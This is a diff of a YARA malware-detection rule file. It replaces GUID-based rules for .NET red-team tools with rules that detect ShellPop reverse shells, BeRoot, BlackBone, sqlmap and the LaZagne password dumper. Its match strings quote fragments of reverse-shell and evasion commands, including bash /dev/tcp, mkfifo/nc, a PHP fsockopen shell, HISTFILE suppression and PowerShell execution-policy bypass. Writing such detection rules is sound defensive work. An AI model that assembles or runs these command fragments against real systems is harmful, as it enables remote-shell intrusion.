-		id = "12a15e61-30fb-50a3-a59b-39f9871444f0"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/rasta-mouse/AmsiScanBufferBypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L588-L601"
+		description = "Detects malicious python shell"
+		author = "Tobias Michalski"
+		id = "62fe0ae9-422e-5021-8a67-e88ff4bd2cf3"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4313-L4325"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "227b9878e11d1e14aa216cc9d46364cff727b1443f4c18f083971be8dd5e603c"
+		logic_hash = "e4c35bb739eeabf0de558ee1b97225ed4eb3198e7e6db1817348115b848146c7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "aee1c9e45a1edb5e462522e266256f68313e2ff5956a55f0a84f33bc6baa980b"
 
 	strings:
-		$typelibguid0lo = "431ef2d9-5cca-41d3-87ba-c7f5e4582dd2" ascii wide
+		$ = "os.putenv('HISTFILE', '/dev/null');" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 2KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Shellcodeloader : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_PHP_TCP : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b8787dac-48a3-5711-86ba-0fda86b6224e"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/Hzllaga/ShellcodeLoader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L603-L616"
+		description = "Detects malicious PHP shell"
+		author = "Tobias Michalski"
+		id = "3bafc225-62e5-5183-84aa-9c3406b6c444"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4327-L4340"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3461e21a0a0661be9830023d56ecdd0434ab9f32328118ad87b2216061851127"
+		logic_hash = "8ffab71130b4fa6efbe9864f97c33fed9359f79d51b84e8f952c911f24d1496c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0412e1ab9c672abecb3979a401f67d35a4a830c65f34bdee3f87e87d060f0290"
 
 	strings:
-		$typelibguid0lo = "a48fe0e1-30de-46a6-985a-3f2de3c8ac96" ascii wide
+		$x1 = "php -r \"\\$sock=fsockopen" ascii
+		$x2 = ";exec('/bin/sh -i <&3 >&3 2>&3');\"" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Keystrokeapi : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Powershell_TCP : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e715bce8-531b-5e2a-bd02-b2fc4990c499"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/fabriciorissetto/KeystrokeAPI"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L618-L632"
+		description = "Detects malicious powershell"
+		author = "Tobias Michalski"
+		id = "4f3a92db-f686-559a-9588-fb79f423c51f"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4342-L4355"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "36690992d1e5f3df52ad3a3fc218335ee78ce5e1bf7433fa769c8ee618f00b9e"
+		logic_hash = "8eb484ba87fa2e10af3c59445ccb4be73db2f5ae67c59118a2e188ba02fdc957"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8328806700696ffe8cc37a0b81a67a6e9c86bb416364805b8aceaee5db17333f"
 
 	strings:
-		$typelibguid0lo = "f6fec17e-e22d-4149-a8a8-9f64c3c905d3" ascii wide
-		$typelibguid1lo = "b7aa4e23-39a4-49d5-859a-083c789bfea2" ascii wide
+		$ = "Something went wrong with execution of command on the target" ascii
+		$ = ";[byte[]]$bytes = 0..65535|%{0};$sendbytes =" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 3KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Shellcoderunner : FILE
+rule SIGNATURE_BASE_SUSP_Powershell_Shellcommand_May18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "949364e7-dcb6-5afd-ade9-cc34a6e15e97"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/antman1p/ShellCodeRunner"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L634-L648"
+		description = "Detects a supcicious powershell commandline"
+		author = "Tobias Michalski"
+		id = "efa81fd0-b764-5a1a-98a5-fc3135be220b"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4357-L4370"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fecb1562fe42fa512ab3dd932019fa9ba2c09d574e909361c3af9e190cd5db17"
-		score = 75
+		logic_hash = "bc858d74b8aad09ff539489e961e1a51ba5fe17d3424615ffe5029587ddb9478"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8328806700696ffe8cc37a0b81a67a6e9c86bb416364805b8aceaee5db17333f"
 
 	strings:
-		$typelibguid0lo = "634874b7-bf85-400c-82f0-7f3b4659549a" ascii wide
-		$typelibguid1lo = "2f9c3053-077f-45f2-b207-87c3c7b8f054" ascii wide
+		$x1 = "powershell -nop -ep bypass -Command" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 3KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Offensivecsharp : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Telnet_TCP : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "339f6858-6076-5320-ba5f-2903e642ea42"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/diljith369/OffensiveCSharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L650-L674"
+		description = "Detects malicious telnet shell"
+		author = "Tobias Michalski"
+		id = "dbd5cc65-c6f1-54f3-813f-7a7f9bcca184"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4372-L4385"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "64beb345845aeb7083a2c35d94fa433e95dd810b82c0cf392dd5e3de3bb5b110"
+		logic_hash = "e900fb8c0f1fa61f242b97ac542cb1bfd691dd50523e0023e97e3b21617053d7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cf5232bae0364606361adafab32f19cf56764a9d3aef94890dda9f7fcd684a0e"
 
 	strings:
-		$typelibguid0lo = "6c3fbc65-b673-40f0-b1ac-20636df01a85" ascii wide
-		$typelibguid1lo = "2bad9d69-ada9-4f1e-b838-9567e1503e93" ascii wide
-		$typelibguid2lo = "512015de-a70f-4887-8eae-e500fd2898ab" ascii wide
-		$typelibguid3lo = "1ee4188c-24ac-4478-b892-36b1029a13b3" ascii wide
-		$typelibguid4lo = "5c6b7361-f9ab-41dc-bfa0-ed5d4b0032a8" ascii wide
-		$typelibguid5lo = "048a6559-d4d3-4ad8-af0f-b7f72b212e90" ascii wide
-		$typelibguid6lo = "3412fbe9-19d3-41d8-9ad2-6461fcb394dc" ascii wide
-		$typelibguid7lo = "9ea4e0dc-9723-4d93-85bb-a4fcab0ad210" ascii wide
-		$typelibguid8lo = "6d2b239c-ba1e-43ec-8334-d67d52b77181" ascii wide
-		$typelibguid9lo = "42e8b9e1-0cf4-46ae-b573-9d0563e41238" ascii wide
-		$typelibguid10lo = "0d15e0e3-bcfd-4a85-adcd-0e751dab4dd6" ascii wide
-		$typelibguid11lo = "644dfd1a-fda5-4948-83c2-8d3b5eda143a" ascii wide
+		$x1 = "if [ -e /tmp/f ]; then rm /tmp/f;" ascii
+		$x2 = "0</tmp/f|/bin/bash 1>/tmp/f" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 3KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_SHAPESHIFTER : FILE
+rule SIGNATURE_BASE_SUSP_Shellpop_Bash
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8903c65a-624f-5e8d-a3f6-4572b56bd2f7"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/matterpreter/SHAPESHIFTER"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L676-L689"
+		description = "Detects susupicious bash command"
+		author = "Tobias Michalski"
+		id = "771b7d01-272a-5986-af07-7417b84c52ed"
+		date = "2018-05-18"
+		modified = "2025-04-11"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4387-L4404"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "87804b4f657dd838e969e41320d08455470611688f1624632df03868d204490d"
-		score = 75
+		logic_hash = "a557822eaaad84897acc32935f7545deb17ea3b8c6e34acd0ac5ef9fad08cb1e"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "36fad575a8bc459d0c2e3ad626e97d5cf4f5f8bedc56b3cc27dd2f7d88ed889b"
 
 	strings:
-		$typelibguid0lo = "a3ddfcaa-66e7-44fd-ad48-9d80d1651228" ascii wide
+		$x1 = "bash -i >& /dev/tcp/" ascii
+		$x2 = "bash -i >& /dev/tcp/" ascii base64
+		$fp1 = "bash -i >& /dev/tcp/IP/PORT" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Evasor : FILE
+rule SIGNATURE_BASE_HKTL_Shellpop_Netcat : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "457959ed-3e90-52c7-89f9-e1b17b35260e"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/cyberark/Evasor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L691-L704"
+		description = "Detects suspcious netcat shellpop"
+		author = "Tobias Michalski"
+		id = "cd55e912-b57b-5fce-98eb-5a0cd27a6e4d"
+		date = "2018-05-18"
+		modified = "2025-12-18"
+		reference = "https://github.com/0x00-0x00/ShellPop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4406-L4421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "883dcb8214c036d4a81ee09f97f206f19f24c6a6526437ba61145cb01cb2b1ba"
+		logic_hash = "2c61da27d4bc455a9f2555fcc1c5cce7cead226a5900eeed1aaf622616051b79"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "98e3324f4c096bb1e5533114249a9e5c43c7913afa3070488b16d5b209e015ee"
 
 	strings:
-		$typelibguid0lo = "1c8849ef-ad09-4727-bf81-1f777bd1aef8" ascii wide
+		$s1 = "if [ -e /tmp/f ]; then rm /tmp/f;" ascii
+		$s2 = "fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc" ascii
+		$s4 = "mknod /tmp/f p && nc" ascii
+		$s5 = "</tmp/f|/bin/bash 1>/tmp/f" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 2KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Stracciatella : FILE
+rule SIGNATURE_BASE_HKTL_Berootexe : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5b1a8102-6d59-5f2f-8ae2-b3c1f75a561d"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/mgeeky/Stracciatella"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L706-L719"
+		description = "Detects beRoot.exe which checks common Windows missconfigurations"
+		author = "yarGen Rule Generator"
+		id = "b91c2e0b-2e47-5339-bf48-eaa8329ea63b"
+		date = "2018-07-25"
+		modified = "2025-12-18"
+		reference = "https://github.com/AlessandroZ/BeRoot/tree/master/Windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4423-L4439"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ca28e325cd98f2c9793c434dfd57404e17ed80e57023095d877993a01ee718ee"
+		logic_hash = "8e10fddd3b3eb5e5200d9ed0bcb23961d196d9e1de03ebf03a96374ee02a9097"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "865b3b8ec9d03d3475286c3030958d90fc72b21b0dca38e5bf8e236602136dd7"
 
 	strings:
-		$typelibguid0lo = "eaafa0ac-e464-4fc4-9713-48aa9a6716fb" ascii wide
+		$s1 = "checks.webclient.secretsdump(" ascii
+		$s2 = "beroot.modules" fullword ascii
+		$s3 = "beRoot.exe.manifest" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 18000KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Logger : FILE
+rule SIGNATURE_BASE_HKTL_Berootexe_Output : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "82937fef-8280-5bc6-af4a-55c5cb3a7553"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/xxczaki/logger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L721-L734"
+		description = "Detects the output of beRoot.exe"
+		author = "Tobias Michalski"
+		id = "dfd11915-443f-5ce9-b94a-bdcb0e62104e"
+		date = "2018-07-25"
+		modified = "2025-12-18"
+		reference = "https://github.com/AlessandroZ/BeRoot/tree/master/Windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4441-L4455"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf77dcb7fccad566e998df42e9a8248a117a8636500b80fe885d756cfa999f37"
+		logic_hash = "7886535d071092df76507f0dd431409e85c368d404f49e7f118278f6565618e6"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "9e92a883-3c8b-4572-a73e-bb3e61cfdc16" ascii wide
+		$s1 = "permissions: {'change_config'" fullword wide
+		$s2 = "Full path: C:\\Windows\\system32\\msiexec.exe /V" fullword wide
+		$s3 = "Full path: C:\\Windows\\system32\\svchost.exe -k DevicesFlow" fullword wide
+		$s4 = "! BANG BANG !" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 400KB and 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Internal_Monologue : FILE
+rule SIGNATURE_BASE_HKTL_Embeddedpdf : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ce2773a2-b0b7-560e-ba21-3f018ddcacb3"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/eladshamir/Internal-Monologue"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L736-L750"
+		description = "Detects Embedded PDFs which can start malicious content"
+		author = "Tobias Michalski"
+		id = "d4e2d878-fb75-54c5-9879-fe94102911d1"
+		date = "2018-07-25"
+		modified = "2025-12-18"
+		reference = "https://twitter.com/infosecn1nja/status/1021399595899731968?s=12"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4457-L4473"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "983273ebcba36e8a22d5bda8bdbba0e1fb31fb128a76a7b39aa012bc83873aff"
+		logic_hash = "041580406e2a7c644d713d8fbf7fccb81664ff536e62df26b3c0f331409fb993"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "0c0333db-8f00-4b68-b1db-18a9cacc1486" ascii wide
-		$typelibguid1lo = "84701ace-c584-4886-a3cf-76c57f6e801a" ascii wide
+		$x1 = "/Type /Action\n /S /JavaScript\n /JS (this.exportDataObject({" fullword ascii
+		$s1 = "(This PDF document embeds file" fullword ascii
+		$s2 = "/Names << /EmbeddedFiles << /Names" fullword ascii
+		$s3 = "/Type /EmbeddedFile" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5025 and 2 of ( $s* ) and $x1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_GRAT2 : FILE
+rule SIGNATURE_BASE_HKTL_Blackbone_Driverinjector : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e731d563-0d16-5f84-8127-624a71f8b646"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/r3nhat/GRAT2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L752-L765"
+		description = "Detects BlackBone Driver injector"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0d992a6c-c57a-5895-af0d-9c167d922601"
+		date = "2018-09-11"
+		modified = "2025-12-18"
+		old_rule_name = "HTKL_BlackBone_DriverInjector"
+		reference = "https://github.com/DarthTon/Blackbone"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4475-L4503"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "535f24d46b317dc5c74779931deb92dd922a79cba4f48588763a3d717bbdec82"
-		score = 75
+		logic_hash = "d6a5f02a465ea46892e1de54a3482aace387ab0d2cdb949e263ce63f4f9edbb7"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8062a4284c719412270614458150cb4abbdf77b2fc35f770ce9c45d10ccb1f4d"
+		hash2 = "2d2fc27200c22442ac03e2f454b6e1f90f2bbc17017f05b09f7824fac6beb14b"
+		hash3 = "e45da157483232d9c9c72f44b13fca2a0d268393044db00104cc1afe184ca8d1"
 
 	strings:
-		$typelibguid0lo = "5e7fce78-1977-444f-a18e-987d708a2cff" ascii wide
+		$s1 = "=INITtH=PAGEtA" fullword ascii
+		$s2 = "BBInjectDll" fullword ascii
+		$s3 = "LdrLoadDll" fullword ascii
+		$s4 = "\\??\\pipe\\%ls" fullword wide
+		$s5 = "Failed to retrieve Kernel base address. Aborting" fullword ascii
+		$x2 = "BlackBone: %s: APC injection failed with status 0x%X" fullword ascii
+		$x3 = "BlackBone: PDE_BASE/PTE_BASE not found " fullword ascii
+		$x4 = "%s: Invalid injection type specified - %d" fullword ascii
+		$x6 = "Trying to map C:\\windows\\system32\\cmd.exe into current process" fullword wide
+		$x7 = "\\BlackBoneDrv\\bin\\" ascii
+		$x8 = "DosDevices\\BlackBone" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and ( 3 of them or 1 of ( $x* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Powershdll : FILE
+rule SIGNATURE_BASE_HKTL_Sqlmap : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3f582a47-078e-525f-9d02-4ee7a455a3b2"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/p3nt4/PowerShdll"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L767-L780"
+		description = "Detects sqlmap hacktool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "da2029dd-c4ce-557f-a409-c468fa3deef3"
+		date = "2018-10-09"
+		modified = "2025-12-18"
+		reference = "https://github.com/sqlmapproject/sqlmap"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4505-L4518"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c2b4a2e3008605c35296d2064d4ab3dbb62230db57d1756f0c11e47a303c007"
+		logic_hash = "9aa13bc2db40f5ab3debd617c84b1e11805d137bc55e9088bc9a0c23e185dfce"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9444478b03caf7af853a64696dd70083bfe67f76aa08a16a151c00aadb540fa8"
 
 	strings:
-		$typelibguid0lo = "36ebf9aa-2f37-4f1d-a2f1-f2a45deeaf21" ascii wide
+		$x1 = "if cmdLineOptions.get(\"sqlmapShell\"):" fullword ascii
+		$x2 = "if conf.get(\"dumper\"):" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 50KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Csharpamsibypass : FILE
+rule SIGNATURE_BASE_HKTL_Sqlmap_Backdoor : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ca97004e-edc1-5b5a-ac67-e81ae24631aa"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/WayneJLee/CsharpAmsiBypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L782-L795"
+		description = "Detects SqlMap backdoors"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bf09caac-cf15-5936-b5b4-df4f28788961"
+		date = "2018-10-09"
+		modified = "2025-12-18"
+		reference = "https://github.com/sqlmapproject/sqlmap"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4520-L4536"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "65daf297f51dd75ed3616504df96aea9b7a61aebd5a3b43c208f1709daedc193"
+		logic_hash = "5e09135e3908442d873511b7b75c8475b2345a28f3bad41a242d6fc5a3b7c002"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$typelibguid0lo = "4ab3b95d-373c-4197-8ee3-fe0fa66ca122" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint32( 0 ) == 0x8e859c07 or uint32( 0 ) == 0x2d859c07 or uint32( 0 ) == 0x92959c07 or uint32( 0 ) == 0x929d9c07 or uint32( 0 ) == 0x29959c07 or uint32( 0 ) == 0x2b8d9c07 or uint32( 0 ) == 0x2b859c07 or uint32( 0 ) == 0x28b59c07 ) and filesize < 2KB
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Hastyseries : FILE
+rule SIGNATURE_BASE_HKTL_Lazagne_Passworddumper_Dec18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0d35acf4-c763-593c-94e2-c499d3826375"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/obscuritylabs/HastySeries"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L797-L819"
+		description = "Detects password dumper Lazagne often used by middle eastern threat groups"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bae48a4d-33b6-55b9-abf5-daf87e5da9e9"
+		date = "2018-12-11"
+		modified = "2025-12-18"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4538-L4558"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4987c7afbf339a6a21634eb4647a0b09bfa149d330b7fb2aea2467a25e629c62"
-		score = 75
+		logic_hash = "887c8e91942076395dc7575d5cbd926e7e0971a759daf719983dd918d9babad3"
+		score = 85
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1205f5845035e3ee30f5a1ced5500d8345246ef4900bcb4ba67ef72c0f79966c"
+		hash2 = "884e991d2066163e02472ea82d89b64e252537b28c58ad57d9d648b969de6a63"
